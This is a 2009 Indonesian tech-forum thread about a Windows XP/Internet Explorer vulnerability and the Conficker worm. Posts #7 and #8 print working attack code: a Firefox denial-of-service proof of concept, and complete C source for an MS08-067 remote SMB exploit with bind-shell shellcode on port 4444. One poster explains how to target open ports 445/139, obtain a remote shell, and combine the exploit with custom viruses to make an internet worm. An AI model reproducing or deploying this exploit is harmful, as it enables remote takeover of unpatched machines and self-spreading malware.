Page 1 of 2 12 LastLast
Results 1 to 15 of 29
http://idgs.in/216804
  1. #1
    rulez's Avatar
    Join Date
    Feb 2008
    Location
    Bandung
    Posts
    2,011
    Points
    2,416.90
    Thanks: 1 / 0 / 0

    Default [News]Waspada Windows XP Rentan Dibobol

    Waspada Windows XP Rentan Dibobol
    Rabu, 8 Juli 2009 - 13:09 wib


    NEW YORK - Di tengah kesibukan menyambut kehadiran Windows 7, Microsoft malah tengah disibukkan dengan sistem operasi lawasnya, Windows XP. Sebab, menurut Microsoft, sistem operasi mereka terdeteksi lubang yang bisa menjadi ancaman serius bagi penggunanya.

    Melalui basis Windows XP dan Server 2003, para peretas tersebut mengincar pengguna browser Internet Explorer. Selain disusupi dan merusak, para pengguna XP dan Server 2003 juga akan diambil data mereka. Aksi para penjahat cyber itu biasanya, memancing pengguna IE untuk masuk ke situs tertentu yang sudah diinfeksi.

    "Sekelompok hacker telah berhasil masuk dari rentannya sistem operasi XP. Kami menyadari serangan mencoba memanfaatkan kerentanan tersebut," diakui Microsoft melalui juru bicaranya, seperti yang dikutip AFP, Rabu (8/7/2009).

    Beberapa aplikasi hiburan juga rentan untuk dibobol, seperti fitur merekam dan mengedit video. Fitur ini sendiri merupakan bagian dari Windows Media Center. Oleh sebab itu juga, Microsoft meminta untuk menghentikan sementara aplikasi tersebut.

    Untuk itulah Microsoft menyarankan agar pengguna masuk kedalam sebuah situs yang beralamat di ActiveX. "Microsoft sedang berupaya untuk mengembangkan update keamanan untuk kerentanan Windows melalui alamat situs ini," sambung sang juru bicara.
    (srn)
    source
    ====
    wah ati" neh.. yang pake xp.. lah gw juga masih pake XP ...

  2. Hot Ad
  3. #2

    Join Date
    Oct 2006
    Posts
    1,190
    Points
    1,460.50
    Thanks: 4 / 9 / 8

    Default

    kabarnya hanya internet explorer 6 dengan 7 yang bisa di bobol
    kalo IE 8 sudah tidak mempan

    untung gw pake IE8 + lastest cumulative update

  4. #3
    petrusali's Avatar
    Join Date
    Apr 2008
    Location
    Bojonegoro
    Posts
    3,376
    Points
    3,648.30
    Thanks: 38 / 44 / 26

    Default

    Kekna emang IE8 "sementara ini" secure. Tapi IE8 punya kelemahan vital. Yaitu gk compatible ama semua web site. Hal ini memaksa user menggunakan fitur compatibility mode. Yg berbuntut keluar lg hole dr IE versi lama (kalo mau ngetes bs buka situ2 hacking & cracking). Cara wat nutupin hole ini kudu pake add-on (lupa namany) yg gk gratis.

    @TS
    Wat gw judul thread yg paling pas "Waspadalah! Windows XP itu dodol!!!"
    Last edited by petrusali; 09-07-09 at 20:14.
    Mau nelpon murah? Click here & input ref code rva296.

  5. #4

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    dr akhir 2008 jg udah ga secure prasaan winduz xp SP brp ja, makanya kluar seven , itu kan awal2 keluar kido/conficker xp udh ke exploitasi besar2n, sm keq dlu hole di RPC pas XP SP1..KAHT btebaran, skrg ms08_067_netapi exploit service SMB n RPC dipake ma conficker wat spreadingny,. klo soal IE ma masih bug mpe skrg,. FF jg sih,. cb msk sini:
    http://bloodiez.phpnet.us/cr4545sh.html
    bk pake IE,. FF jg bole, pa ja dah.. masi bs kena client side DoS kan?.. klo ane taro cookie trap jg nanganinny gmn tu IE ma FF?pake addon noscript? ga jamin jg..

  6. #5
    billiard's Avatar
    Join Date
    May 2008
    Location
    Earth, Milky way
    Posts
    763
    Points
    931.90
    Thanks: 23 / 3 / 3

    Default

    @blood13z
    link yang u kasih itu emang bug exploit? langsung crash FF wa...( not responding -_-!!)

  7. #6
    rulez's Avatar
    Join Date
    Feb 2008
    Location
    Bandung
    Posts
    2,011
    Points
    2,416.90
    Thanks: 1 / 0 / 0

    Default

    iya tu link nya crash.. emang sengaja ??

    masih penasaran nunggu XP SP4 ne

  8. #7
    petrusali's Avatar
    Join Date
    Apr 2008
    Location
    Bojonegoro
    Posts
    3,376
    Points
    3,648.30
    Thanks: 38 / 44 / 26

    Default

    Itu link isiny cuman repetisi doank kok
    Code:
    <html>
    
    <title>Mozilla Firefox 3.0.1 Remote Denial of Service PoC</Title>
    
    <head>
    
    <body>
    
    <script type="text/javascript">
    
    function romania()
    {
    	title="****";
    
    	url="http://www.mortal-team.org/";
    
    	if (window.sidebar)
    	{
    		window.sidebar.addPanel(title, url,"");
    	} 
    		
    		else if( window.external )
    		{
    			window.external.AddFavorite( url, title);
    		}
    	
    			else if(window.opera && window.print)
    			{
    				return (true);
    			}
    }
    
    	for (i=0; i<i+1; i++)
    
    	romania();
    
    </script>
    
    </body>
    </noscript>
    <div style="text-align: center;"><div style="position:relative; top:0; margin-right:auto;margin-left:auto; z-index:99999">
    <IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=334085"></IFRAME><SCRIPT TYPE="text/javascript/" SRC="http://adserving.cpxinteractive.com/st?ad_type=pop&ad_size=0x0&entity=39642&site_code=Byet_Pop&section_code=Byet_Pop&banned_pop_types=28&pop_times=3&pop_frequency=3600"></SCRIPT>
    </div></div>
    
    </head>
    
    </html>
    Mau nelpon murah? Click here & input ref code rva296.

  9. #8

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    bkn exploit koq,. biasa itu maenan overload request, semua aplikasi jg bisa digituin., bahayany klo aplikasiny pny buffer yg limitasi ny kaga bner.. masuk dah shellcode,
    ni salah satu metoda spread si conficker ma kido, yg desain om phantom GG dah ngoverflowny..
    Spoiler untuk code :
    Code:
    #include <winsock2.h>
    #include <windows.h>
    #include <stdio.h>
    #include <io.h>
    #include <fcntl.h>
    #include <memory.h>
    #include <wchar.h>
    #include "srvsvc.h"
    #include "srvsvc_c.c"
    #include "mem.h"
    
    
    #pragma comment(lib,"ws2_32")
    #pragma comment(lib,"mpr")
    #pragma comment(lib,"rpcrt4.lib")
    #pragma comment(lib,"MSVCRT.LIB")
    
    DWORD	dwRetAddr = 0x7ffa0eb8;
    DWORD	dwJmpAddr = 0x7ffa0eb7;
    
    /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
    unsigned char sc[] =
    "\x83\xEC\x70"	// sub esp, 0x70
    "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
    "\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
    "\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
    "\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
    "\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
    "\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
    "\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
    "\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
    "\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
    "\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
    "\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
    "\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
    "\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
    "\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
    "\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
    "\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
    "\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
    "\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
    "\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
    "\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
    "\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
    "\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
    
    
    int MakeBuff(char *Buff,int BufLen);
    void Usage(char *ProgName);
    int WaitExit();
    
    #define CN	0
    #define TW	1
    
    void main(int argc, char *argv[])
    {
    	NETRESOURCE	lpNetResource;
    	char	Username[256] = {0};
    	char	Password[256] = {0};
    	DWORD	Ret = 0;
    	RPC_STATUS status;
    	unsigned char * pszUuid = NULL;
    	unsigned char * pszProtocolSequence = "ncacn_np";
    	unsigned char * pszNetworkAddress = "";
    	unsigned char	pszEndpoint[100] = "\\pipe\\browser";
    	unsigned char * pszOptions = NULL;
    	unsigned char * pszStringBinding = NULL;
    
    	char	Server[256] = {0};
    	char	RemoteName[256] = {0};
    	char	Buff[0x700];
    	char	Buff2[1000] = {0};
    	char	*pBuff2 = (char *)&Buff2;
    	char	Buff3[100] = {0};
    	int		BufLen = 0;
    //	int		i;
    	int		ForceAttack = 0;
    	int		AntiDEP = 0;
    
    	int		nLanguage = 0;
    	DWORD	dwID = 0;
    
    	if(argc != 2)
    	{
    		Usage(argv[0]);
    		return;
    	}
    
    	strcpy(Server,argv[1]);
    	sprintf(RemoteName,"\\\\%s\\IPC$",Server);
    	pszNetworkAddress = Server;
    
    
    	if(strlen(Server) == 0)
    	{
    		Usage(argv[0]);
    		return;
    	}
    
    	printf("\nMS08-067 Exploit for CN by [email protected]\n\n");
    
    	lpNetResource.dwScope=RESOURCE_CONNECTED;
    	lpNetResource.dwType =RESOURCETYPE_DISK;
    	lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
    	lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
    	lpNetResource.lpLocalName=NULL;
    	lpNetResource.lpRemoteName = RemoteName;
    	lpNetResource.lpComment=NULL;
    	lpNetResource.lpProvider=NULL;
    
    	Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
    	if(Ret != NO_ERROR)
    	{
    		printf("Make SMB Connection error:%d\n",GetLastError());
    		return;
    	}
    	
    	printf("SMB Connect OK!\n");
    
    	status = RpcStringBindingCompose(pszUuid,
    									pszProtocolSequence,
    									pszNetworkAddress,
    									pszEndpoint,
    									pszOptions,
    									&pszStringBinding);
    	if(status != RPC_S_OK)
    	{
    		return;
    	}
    	status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
    	if(status != RPC_S_OK)
    	{
    		return;
    	}
    
    
       RpcTryExcept
        {
    
    		func23(L"ph4nt0m",(wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89",(wchar_t *)"\x4D\x00\x56\x89\x56\x89",4,0);
    
    
    		memset(Buff,0,sizeof(Buff));
    		BufLen = MakeBuff(Buff,sizeof(Buff));
    
    		CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
    		(DWORD)*(DWORD *)Buff3 = 1;
    		func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
    
        }
        RpcExcept ( 1 )
        {
            status = RpcExceptionCode();
    		if(status == 1726)
    		{
    		}
    		else
    		{
    			printf("RpcExceptionCode() = %u\r\n", status );
    			return;
    		}
        }
        RpcEndExcept
    //*/
    	printf("Maybe Patched!\n");
    
    
        RpcStringFree( &pszStringBinding );
        RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
    	return;
    }
    
    
    #define	JMPPOINT	"B041"
    int MakeBuff(char *Buff, int BufLen)
    {
    	int len = 0;
    	char tmp[5] = {0};
    	int i;
    
    	for(i = 0; i < BufLen/4; i++)
    	{
    		memset(tmp,0,4);
    		sprintf(tmp,"B%03d",i);
    //*		
    		if(memcmp(tmp,JMPPOINT,4) == 0)
    		{
    			break;
    		}
    //*/
    		memcpy(Buff + len,tmp,4);
    		len += 4;
    	}
    
    	memcpy(Buff,L".\\\\a\\..\\..\\NN",13*2);
    
    	for(i = 0; i < 6; i++)
    	{
    		memcpy(Buff + len,&dwRetAddr,4);
    		len += 4;
    	}
    	
    	memcpy(Buff + len,&dwJmpAddr,4);
    	len += 4;
    	memset(Buff + len,0x48,0x4);
    	len += 4;
    
    	memcpy(Buff + len,sc,sizeof(sc) - 1);
    	len += sizeof(sc) - 1;
    
    	memcpy(Buff + len,"EMM!",4);
    	len += 4;
    
    	memset(Buff + 0x206 * 2,0,2);
    	return len;
    }
    
    void Usage(char *ProgName)
    {
    	printf("\n MS08-067 Exploit for CN by [email protected]\n\n %s <Server>\n\n",ProgName);
    	return;
    }
    
    int WaitExit()
    {
    	Sleep(1000 * 5);
    	printf("Send Payload Over!\n");
    	ExitProcess(0);
    	return 0;
    }

    tar tgl set target yg port 445 n 139ny kbuka 80% winXP SP1,2 n 3 buka koneksi outbound tar. tgl telnet tanpa pass ke port 4444,. shell di tgn deh.. gmn jadinya tuh klo dicombine modulny buat injeksi virus2 custom kita..hehe jadi worm deh di inet.. mkny mikocok nyari yg buat conficker>.<

  10. #9
    chikebum's Avatar
    Join Date
    Nov 2006
    Posts
    3,396
    Points
    4,709.22
    Thanks: 13 / 295 / 70

    Default

    hayo hayo..hacker...jgn pada ngajarin ya...swt deh --"

    =D

  11. #10

    Join Date
    Jan 2009
    Posts
    194
    Points
    239.70
    Thanks: 0 / 8 / 6

    Default

    windows 7 menggunakan bahasa pemrogaman berbeda

    krn sudah mentok microsoft sering di jebol akhir nya mereka mengguanakan bahasa pemerogaman baru


    saya saja masih lumayan bingung liat coding nya

    doain yah biar pada sukses bobo windows 7 hehe

  12. #11

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by Pemuja-***** View Post
    windows 7 menggunakan bahasa pemrogaman berbeda

    krn sudah mentok microsoft sering di jebol akhir nya mereka mengguanakan bahasa pemerogaman baru


    saya saja masih lumayan bingung liat coding nya

    doain yah biar pada sukses bobo windows 7 hehe
    mksdny di ring 0 ny pake programming language yg berbeda om? emg di ring 0 mikocok sebelumny buat pke prog language paan? wow si om ebat uy bisa liat codingny mikocok ^ ^ ajarin dunk om..

  13. #12
    kenzo's Avatar
    Join Date
    Oct 2006
    Location
    Trisakti University
    Posts
    3,419
    Points
    27.68
    Thanks: 44 / 120 / 56

    Default

    Adoh...gue nga seberapa paham klu uda sampe ke sell yg kecil2... Tp nih topik menarik sekali gue baca... Lanjutkan gan... masalahnya ane pemakai windows xp... pelajaran nih buat gue... sedot ilmu nya dolo...
    who am I?
    who?
    I'm Spiderman! :pcool:

  14. #13
    petrusali's Avatar
    Join Date
    Apr 2008
    Location
    Bojonegoro
    Posts
    3,376
    Points
    3,648.30
    Thanks: 38 / 44 / 26

    Default

    Quote Originally Posted by Pemuja-***** View Post
    windows 7 menggunakan bahasa pemrogaman berbeda

    krn sudah mentok microsoft sering di jebol akhir nya mereka mengguanakan bahasa pemerogaman baru


    saya saja masih lumayan bingung liat coding nya

    doain yah biar pada sukses bobo windows 7 hehe
    Wew, bs liat coding Windows? Dpt ilmu drmn kk? Setau gw sejak Win 3 ampe XP, MS pake C language. Tp utk Vista & 7 gk tau gw (tp gw yakin tetep sama).

    Source: http://answers.google.com/answers/th...id/196930.html
    Last edited by petrusali; 16-07-09 at 23:53.
    Mau nelpon murah? Click here & input ref code rva296.

  15. #14

    Join Date
    Jan 2009
    Posts
    194
    Points
    239.70
    Thanks: 0 / 8 / 6

    Default

    Quote Originally Posted by bl00d13z View Post
    mksdny di ring 0 ny pake programming language yg berbeda om? emg di ring 0 mikocok sebelumny buat pke prog language paan? wow si om ebat uy bisa liat codingny mikocok ^ ^ ajarin dunk om..
    Quote Originally Posted by petrusali View Post
    Wew, bs liat coding Windows? Dpt ilmu drmn kk? Setau gw sejak Win 3 ampe XP, MS pake C language. Tp utk Vista & 7 gk tau gw (tp gw yakin tetep sama).

    Source: http://answers.google.com/answers/th...id/196930.html
    wah2 terpaksa harus install windows 7 lagi abis saya belum liat sampai sedalam itu

    abis waktu itu banyak banget progam yg gak bisa di pakai wcry:

    tapi yg pasti penarapan pada registry sangat berbeda saya sempat lihat yg itu nya (dari penempatan registry sudah beda dan juga cara merubah nya
    tapi kalau cell2 coding saya sama sekali lom liat

    teman saya juga sempat liat cding nya katanya beda


    tunggu aja dulu malam ini wa isntall dulu lagi windows 7 beta nya

  16. #15
    petrusali's Avatar
    Join Date
    Apr 2008
    Location
    Bojonegoro
    Posts
    3,376
    Points
    3,648.30
    Thanks: 38 / 44 / 26

    Default

    OK kk. Gw tunggu good news-ny. Mayan neh kalo bs tau dikit2 dalemanny Windows.
    Mau nelpon murah? Click here & input ref code rva296.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •